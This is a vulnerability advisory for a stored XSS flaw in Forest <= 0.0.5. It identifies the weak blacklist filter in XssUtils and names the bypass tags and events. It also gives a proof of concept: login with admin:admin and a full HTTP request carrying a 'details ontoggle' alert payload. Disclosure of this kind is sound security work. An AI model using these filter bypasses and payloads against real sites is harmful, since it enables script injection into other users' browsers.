NeverStopExploiting用户9473
Stored XSS in Forest <= 0.0.5 Article/Comment
输入“/”快速插入内容
Stored XSS in Forest <= 0.0.5 Article/Comment
Stored XSS in Forest <= 0.0.5 Article/Comment
用户9473用户94732月10日修改
BUG_Author: ChengxinXu
Affected Version: Forest (<= 0.0.5 version defined from pom.xml)
Vulnerability Files:
•
src/main/java/com/rymcu/forest/util/XssUtils.java
•
src/main/java/com/rymcu/forest/service/impl/ArticleServiceImpl.java
•
src/main/java/com/rymcu/forest/service/impl/CommentServiceImpl.java
•
src/main/java/com/rymcu/forest/service/impl/PortfolioServiceImpl.java
Description
Forest <= 0.0.5 contains a stored XSS vulnerability due to insufficient input validation in the XssUtils.replaceHtmlCode() method, allowing authenticated attackers to inject malicious JavaScript code through article content, comments, and portfolio descriptions.
Stored XSS via Article Content (/api/v1/article/post)
When a user submits article content, the request is processed without proper sanitization.
Entry Point (ArticleController.java:53-58):
代码块
@PostMapping("/post")
@RequiresPermissions(value = "user")
public GlobalResult<Long> postArticle(@RequestBody ArticleDTO article) throws UnsupportedEncodingException {
User user = UserUtils.getCurrentUserByToken();
return GlobalResultGenerator.genSuccessResult(articleService.postArticle(article, user)); // User-controlled input
}
The articleContentHtml field from ArticleDTO is passed to ArticleService.postArticle(), which applies XSS filtering using a blacklist approach.
Vulnerable Code (ArticleServiceImpl.java:114):
代码块
String articleContentHtml = XssUtils.filterHtmlCode(article.getArticleContentHtml()); // Insufficient filtering
In the file XssUtils.java, the replaceHtmlCode() method uses a blacklist approach to filter XSS attacks. This method only removes <script> and <marquee> tags and a limited set of event handlers, allowing attackers to bypass the filter using unfiltered HTML tags and events.
Vulnerable Code (XssUtils.java:28-50):
Root Cause:
The filtered content is stored in the database and later rendered in the frontend, allowing the malicious payload to execute when victims view the article
An attacker can bypass the blacklist filter using unfiltered HTML tags (<iframe>, <svg>, <details>) and events (ontoggle, onbegin, onfocusin) to execute arbitrary JavaScript code in victims' browsers.
Proof of Concept
Prerequisites:
•
Authenticated user account
Step 1: Login
Login from frontend: admin:admin
Step 2: Exploit XSS via Article Content
Create an article contains xss payload
代码块
POST /api/article/post HTTP/1.1
Host: localhost:3000
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Authorization: eyJhbGciOiJIUzI1NiJ9.eyJqdGkiOiJhZG1pbiIsInN1YiI6ImFkbWluIiwiaWF0IjoxNzcwNjg4NTMxfQ.GqzZgHIR4ausjZ90aOLdRfWBOnRT2rqoEm0FsDb7G_k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
sec-ch-ua: "Not(A:Brand";v="8", "Chromium";v="144", "Google Chrome";v="144"
Accept-Encoding: gzip, deflate, br, zstd
sec-ch-ua-mobile: ?0
Referer: http://localhost:3000/topic/news?page=1
Cookie: auth.strategy=local; auth._token.local=eyJhbGciOiJIUzI1NiJ9.eyJqdGkiOiJhZG1pbiIsInN1YiI6ImFkbWluIiwiaWF0IjoxNzcwNjg4NTMxfQ.GqzZgHIR4ausjZ90aOLdRfWBOnRT2rqoEm0FsDb7G_k; auth._token_expiration.local=1770689430548
Accept-Language: zh-CN,zh;q=0.9
sec-ch-ua-platform: "Windows"
Accept: application/json, text/plain, */*
Sec-Fetch-Site: same-origin
Content-Type: application/json
{
"articleTitle": "XSS Test",
"articleContentHtml": "<details open ontoggle=alert('XSS')>test</details>",
"articleTags": "test"
}